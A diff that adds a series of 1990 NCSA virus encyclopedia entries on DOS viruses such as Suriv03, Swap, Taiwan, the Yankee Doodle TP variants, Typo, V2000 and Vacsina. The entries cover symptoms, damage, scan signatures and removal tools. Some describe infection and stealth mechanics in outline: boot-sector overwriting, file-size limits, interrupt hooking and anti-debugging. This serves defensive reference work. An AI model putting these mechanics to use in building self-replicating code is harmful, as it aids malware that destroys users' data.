b/textfiles.com/virus/NCSA/ncsa117.txt @@ -0,0 +1,78 @@ + Ŀ + VIRUS REPORT + Suriv03 + + +Synonyms: Israeli, Suriv 3.00 + +Place of Origin: Israel. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects COM, EXE, overlay files. Does not +infect COMMAND.COM + +OnScreen Symptoms: A black square may appear on the screen after +activation. + +Increase in Size of Infected Files: 1813 bytes (COM files) and 1808 bytes +(EXE files). + +Nature of Damage: Affects system run-time operation. Corrupts program or +overlay files. + +Detected by: Scanv56+, F-Prot, Pro-Scan. + +Removed by: CleanUp, Scan/D, F-Prot, or UnVirus. + +Derived from: Suriv02. + +Scan Code: You can search at offset 099H for FC B4 E0 CD 21 80 FC E0 73 +16. + + This virus is nearly identical to the Jerusalem virus, which is much +better known, and which was derived from it. The virus activates on +Friday the 13 when an infected program is run. + + It does not delete files, due to a bug in its code. On other days, +after the virus is memory resident for 30 seconds, an area of the screen +is turned into a "black window" and a time wasting loop is executed. + + Differences from the Jerusalem virus: + +* the string "sUMsDos" found in the Jerusalem is "sURIV 3.00" in this + version. + +* the 30 minute delay (before machine slow-down) in the Jerusalem is 30 + seconds in this version (making detection easier with this virus than + with the Jerusalem); + +* there is a bug in the program delete function of the virus, making + this version less lethal than the Jerusalem. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa118.txt b/textfiles.com/virus/NCSA/ncsa118.txt new file mode 100644 index 00000000..71432c25 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa118.txt @@ -0,0 +1,104 @@ + Ŀ + VIRUS REPORT + Swap + + +Synonyms: Israeli Boot, Falling Letters Boot, Fat 12 + +Date of Origin: August, 1989. + +Place of Origin: Israel. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects floppy disk boot sector. + +OnScreen Symptoms: Cascading letters on screen 10 minutes after +activation. + +Increase in Size of Infected Files: n/a. The virus code is 740 bytes. It +uses 2K of memory, once resident. + +Nature of Damage: Corrupts or overwrites boot sector. + +Detected by: Scanv56+, F-Prot, IBM Scan. + +Removed by: MDisk, CleanUp, F-Prot, or the DOS SYS command. + + First studied by Yuval Tal of Israel, and called "the swap virus" +because the message "The Swapping-Virus..." sometimes appears in it and +the words "SWAP VIRUS FAT12" appeared in a modified boot sector on his +disk. Other virus researchers cannot see how the virus would produce +this code, and have suggested that Mr. Tal placed the words there +himself, to help him identify the virus. Since the other researchers +haven't found the word "SWAP" anywhere, they have argued against the +name "Swap", but no one has come up with a better one. "Israeli boot +virus" will suffice only until there is a second virus from Israel that +infects the boot sector (3-4 minutes from now, at the rate we're going!). + + At any rate, this virus may write the following string into bytes +B7-E4 of track 39, sector 7 (if sectors 6 and 7 are empty): + +The Swapping-Virus. (C) June, 1989 by the CIA + + When this virus replicates, however, the message transfers as binary +zeros. Someone may have placed the text message into the virus thinking +that it would replicate along with the virus. + + The Swap virus is somewhat different from other PC boot sector +viruses. Normally a BSV replaces the boot sector with virus code, and +stores the original boot sector somewhere. In some cases (Ping-Pong, +Typo, Brain) the boot sector is stored in unused space, which is then +marked as bad in the FAT. In other cases (Yale, Den Zuk, StonedDen Zuk +virus), the virus stores the boot sector in a sector that is not likely +to be used. One virus (Pentagon) even stores the boot sector in a hidden +file. + + When the computer is booted from a disk infected with the a normal +boot sector infecting virus, the code on the boot sector will read the +rest of the virus into memory. The virus will then install itself, read +the original boot sector and transfer control to it. + + Swap is different. It does not store the original boot sector at +all. Instead it assumes that bytes 196-1B4 (hex) on the boot sector +contain error messages that can be safely overwritten. This is true for +most (but not all) boot sectors. It also assumes that the boot sector +starts with a JMP instruction. Swap then replaces these bytes with code +to read the rest of the virus (which is stored at track 39, sectors 6 and +7) into memory. The virus will then execute the original boot code. The +fact that this virus does not store the original boot sector makes it +hard (and in some cases impossible) to repair an infected +diskette. + + The Swap virus activates after being memory resident for 10 minutes. +A cascading effect of letters and characters on the system monitor is +then seen, similar to the cascading effect of the Cascade and Traceback +viruses. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa119.txt b/textfiles.com/virus/NCSA/ncsa119.txt new file mode 100644 index 00000000..865b8e3a --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa119.txt @@ -0,0 +1,44 @@ + Ŀ + VIRUS REPORT + SYS Virus + + +Host Machine: PC compatibles. + +Derived from: Search-HD. + + This virus is really a modification of the Search-HD virus. The +display code has been replaced (no display occurs on reboot) by code that +disables the SYS program. The SYS program itself is not modified, but any +attempt to execute SYS will result in the program not being loaded. +Instead, multiple reads to the source and target drives will occur (to +simulate the SYS activity). The normal SYS message output is displayed +by the virus at the appropriate time. This virus will successfully avoid +being removed by SYS. The virus does no damage. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa120.txt b/textfiles.com/virus/NCSA/ncsa120.txt new file mode 100644 index 00000000..89742ae6 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa120.txt @@ -0,0 +1,40 @@ + Ŀ + VIRUS REPORT + SYS-B + + +Host Machine: PC compatibles. + +Derived from: SYS virus. + + This is similar to the SYS virus, but it performs a hard disk format +on any Friday 13th after 1990. This virus, and its precursor virus both +still contain the 3.5" bug, so that they are easily detected on systems +using 3.5" drives. They are difficult to detect on other systems. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa121.txt b/textfiles.com/virus/NCSA/ncsa121.txt new file mode 100644 index 00000000..66387e49 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa121.txt @@ -0,0 +1,36 @@ + Ŀ + VIRUS REPORT + SYS-C + + +Host Machine: PC compatibles. + + Similar to the SYS virus but performs random reboots beginning 2 +hours after power-on or initial boot. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa122.txt b/textfiles.com/virus/NCSA/ncsa122.txt new file mode 100644 index 00000000..d552ba02 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa122.txt @@ -0,0 +1,64 @@ + Ŀ + VIRUS REPORT + Taiwan Virus + + +Date of Origin: January, 1990. + +Place of Origin: Taiwan, R.O.C. + +Host Machine: PC compatibles. + +Host Files: Not memory resident. Infects COM files, including +COMMAND.COM. + +Increase in Size of Infected Files: 708 or 743 bytes. + +Nature of Damage: corrupts COM files. + +Detected by: Scanv56+, F-Prot. + +Removed by: CleanUp, Scan/D, or delete infected files. + + Whenever this virus is activated, it attempts to infect up to three +COM files. The search for uninfected COM files begins in the root +directory of C:. Once an uninfected COM file is located, the virus +infects the file by copying the viral code to the first 743 bytes of the +file, relocating the original first 743 bytes of the file to the end of +the COM file. + + If the COM file selected for infection is less than 743 bytes, the +resulting infected COM file will always be 1,486 bytes in length. This +"bug" results from a failure to check for the original file length. + + The virus is destructive. On the 8th day of any month, when an +infected program is run, the virus will perform an absolute disk write +for 160 sectors starting at logical sector 0 on the C: and D: drives, +overwriting the FATs and root directories. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa123.txt b/textfiles.com/virus/NCSA/ncsa123.txt new file mode 100644 index 00000000..690dc42a --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa123.txt @@ -0,0 +1,38 @@ + Ŀ + VIRUS REPORT + Terse Shoe Virus + + +Host Machine: PC compatibles. + +Derived from: Shoe_virus (Ashar). + + This is a variant of the Shoe_virus with the initial text message +truncated to a single line. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa124.txt b/textfiles.com/virus/NCSA/ncsa124.txt new file mode 100644 index 00000000..af1269a0 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa124.txt @@ -0,0 +1,41 @@ + Ŀ + VIRUS REPORT + TP25VIR virus + + +Host Machine: PC compatibles. + +Derived from: Yankee Doodle virus. + + This version of the Yankee Doodle virus does not contain the string +"VACSINA", and does not beep. When the CTRL-ALT-DEL combination is +pressed, the virus plays "Yankee Doodle" and then reboots. The virus +adds new PC/MS-DOS function callL 0xC5. This function call does many +different things, and also may be used as a virus cure. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa125.txt b/textfiles.com/virus/NCSA/ncsa125.txt new file mode 100644 index 00000000..8bce6eea --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa125.txt @@ -0,0 +1,39 @@ + Ŀ + VIRUS REPORT + TP33VIR virus + + +Host Machine: PC compatibles. + + This virus contains a self-defense mechanism. It can recover itself +if up to 16 consecutive bytes are destroyed. Self-correcting "Hemming +code" is used. The virus may not be debugged with tools other than +CodeView, because it disables interrupts 1 and 3. Yankee Doodle is +played at 5:00 PM. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa126.txt b/textfiles.com/virus/NCSA/ncsa126.txt new file mode 100644 index 00000000..0039db8a --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa126.txt @@ -0,0 +1,35 @@ + Ŀ + VIRUS REPORT + TP34VIR virus + + +Host Machine: PC compatibles. + + This version is a TSR. Files are infected as they are run. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa127.txt b/textfiles.com/virus/NCSA/ncsa127.txt new file mode 100644 index 00000000..3ffb9c9a --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa127.txt @@ -0,0 +1,41 @@ + Ŀ + VIRUS REPORT + TP38VIR virus + + +Host Machine: PC compatibles. + + In this version .COM and .EXE files are handled differently. The +virus is able to avoid many of "virus protection" programs which are +watching the use of "dangerous" interrupts. If the virus is active in +memory, and an infected file is loaded for debugging with CodeView, then +the virus removes itself from the file. Because the virus extracts +itself during loading with Codeview, this is a method of cleaning an +infected file. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa128.txt b/textfiles.com/virus/NCSA/ncsa128.txt new file mode 100644 index 00000000..aaf32dcd --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa128.txt @@ -0,0 +1,39 @@ + Ŀ + VIRUS REPORT + TP42VIR virus + + +Host Machine: PC compatibles. + + This version determines whether the computer is infected with the +Italian virus, and if found, tries to kill it. The Italian virus is +modified, and after each new boot the byte which contains virus version +increases by one. When the version reaches zero, the virus disables +itself, leaving only its "body" on the disk. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa129.txt b/textfiles.com/virus/NCSA/ncsa129.txt new file mode 100644 index 00000000..8e0a5331 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa129.txt @@ -0,0 +1,36 @@ + Ŀ + VIRUS REPORT + TP44VIR virus + + +Host Machine: PC compatibles. + + This version plays "Yankee Doodle" at 5:00pm one eighth of the time +the system is booted, making it hard to locate quickly. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa130.txt b/textfiles.com/virus/NCSA/ncsa130.txt new file mode 100644 index 00000000..785f98ca --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa130.txt @@ -0,0 +1,36 @@ + Ŀ + VIRUS REPORT + TP46VIR. + + +Host Machine: PC compatibles. + + This version looks like TP42VIR, but also attempts to kill the 1701 +virus. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa131.txt b/textfiles.com/virus/NCSA/ncsa131.txt new file mode 100644 index 00000000..6d313c02 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa131.txt @@ -0,0 +1,65 @@ + Ŀ + VIRUS REPORT + Typo (Boot infector) + + +Synonyms: Mistake virus + +Date of Origin: June, 1989. + +Place of Origin: Israel. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects floppy and hard disk boot sectors. + +Increase in Size of Infected Files: n/a. + +Nature of Damage: Affects system run-time operation. Corrupts or +overwrites boot sector. + +Detected by: Scanv56+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: MDisk, F-Prot, or DOS SYS command. + +Derived from: Ping Pong? + + Typo Boot was first isolated in Israel by Y. Radai in June, 1989. +This virus takes up 2K at the upper end of system memory once it has +become memory resident. + + The virus will swap some characters on printouts with phonemes (for +example, C vs. K), and transpose or substitute digits. Only printouts +are affected. + + Typo Boot may be derived from Ping Pong, because the two have very +similar internal structures. It can be removed from a disk by using +MDisk, CleanUp, DOS SYS command, or just about any Ping Pong +disinfector. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa132.txt b/textfiles.com/virus/NCSA/ncsa132.txt new file mode 100644 index 00000000..6ed77c40 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa132.txt @@ -0,0 +1,85 @@ + Ŀ + VIRUS REPORT + Typo (COM infector) + + +Synonyms: Fumble virus, 867 virus + +Date of Origin: summer, 1989. + +Place of Origin: Israel. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects COM files. + +Increase in Size of Infected Files: 867 bytes. + +Nature of Damage: Affects system run-time operation; corrupts program or +overlay files. + +Detected by: Scanv48+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: CleanUp, Scan/D, F-Prot, or delete infected files. + + First detected in Israel during the summer of 1989 (Some experts +attribute first detection to Joe Hirst of Brighton, U.K., in November, +1989.) It creates errors in printouts, by (sometimes) replacing some +characters or digits. It is closely related to the Ping-Pong or Italian +virus, which is one of the most common viruses. In fact, the viruses are +so similar that some anti-virus programs even identify Typo as the +Italian virus. This is not so surprising, since the boot sectors are +almost identical. The differences between the boot sectors are: + +* Some local variables have been moved. For example, the word + containing the location of the original boot sector is now located + two bytes earlier than before. + +* The signature (two bytes that the virus uses to see if a diskette has + already been infected) has been changed. + +* The activation times have been changed. Ping-Pong had an "activation + window" (a second or so long) every half hour. Typo will become active + 112.5 seconds after power-on, and will stay active most of the time. + +* The major differences between the two viruses are in the other part + of the virus code, which is not stored in the boot sector, but in the + cluster the viruses mark as "bad" in the FAT. + + Of course, there are quite a few interesting things the viruses have +in common. For instance, Typo contains the same "bug" as Ping-Pong does, +that prevents it from working on '286 and '386 machines. + + It is possible to remove Typo with some programs designed to remove +Ping-Pong. Since the signature is stored in the same place on both +viruses, it is possible to inoculate diskettes against one of them, but +not both. + + Typo will only infect COM files on even-numbered days. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa133.txt b/textfiles.com/virus/NCSA/ncsa133.txt new file mode 100644 index 00000000..ab9f81b8 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa133.txt @@ -0,0 +1,63 @@ + Ŀ + VIRUS REPORT + V2000 + + +Synonyms: Dark Avenger III, Stealth virus, Travel virus + +Date of Origin: February, 1990. + +Place of Origin: Sophia, Bulgaria + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects COM (including COMMAND.COM), EXE, +and overlay files. + +Increase in Size of Infected Files: 2000 bytes. + +Nature of Damage: Affects system run-time operation. Corrupts program +and overlay files. Corrupts file linkage. + +Detected by: Scanv59+ + +Removed by: Scan/D + +Scan Code: "Zopy me - I want to travel". Also contains "(c) 1989 by +Vesselin Bontchev". + + V2000 may look for and delete any programs written by the Bulgarian +Vesselin Bontchev, and contains a copyright notice for him, suggesting +the virus was written neither by him nor by one of his admirers. + + V2000 can make a mess of things. If V2000 is present in memory, a DIR +command won't show that files have grown in size. CHKDSK/F may produce +crosslinked files. System crashes can occur, and some systems won't +boot, due to the modification of COMMAND.COM or the hidden system files. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa134.txt b/textfiles.com/virus/NCSA/ncsa134.txt new file mode 100644 index 00000000..6093b538 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa134.txt @@ -0,0 +1,83 @@ + Ŀ + VIRUS REPORT + Vacsina + + +Date of Origin: August, 1989. + +Place of Origin: Sophia, Bulgaria. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects COM, EXE, SYS, and BIN files. + +OnScreen Symptoms: An infected file may beep when executed. + +Increase in Size of Infected Files: 1206 bytes. + +Nature of Damage: Affects system run-time operation. Corrupts program or +overlay files. + +Detected by: Scanv56+, F-Prot. + +Removed by: CleanUp, Scan/D/A, F-Prot, or delete infected files. + + Synonym: TP04VIR virus. + + Developed in Sophia, Bulgaria, and possibly first reported by +reported by Chris Fischer in Germany in August, 1989. Vacsina takes over +interrupt 21 and connects to COM and EXE files. Vacsina works on +PC/MS-DOS ver. 2.0 or higher. It infects COM files increasing them by +1206 to 1221 bytes (placing the virus code on a paragraph start). It +infects EXE files in two passes: After the first pass the EXE file is 132 +bytes longer; after the second pass its size increases by an aditional +1206 to 1221 bytes. The virus installs a TSR in memory wich will infect +executable files upon loading them (INT 21 subfunction 4B00) using 8208 +bytes of memory. + + The only "function" found so far is an audible alarm or beep(BELL +character) whenever another file is successfully infected. This suggests +that this virus is a "draft", and more is to come. + + Vacsina infects COM files that are bigger than 04B6h bytes and +smaller than F593h bytes and start with a JMP (E9h). Vacsina infects EXE +files if they are smaller than FDB3 bytes (no lower limit). + + The virus is named "vacsina" because it opens a file named VACSINA. It doesn't +check the return status of the open call, and never touches the file +until the end of the virus code, where it closes the file (again ignoring +the return code). It is believed that vacsina is a prematurely-escaped +virus (or code built to detect viruses), and that the virus programmer +will add some code in a later version of the virus. + + To detect the original virus, search for the word VACSINA (all +capitals). + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa135.txt 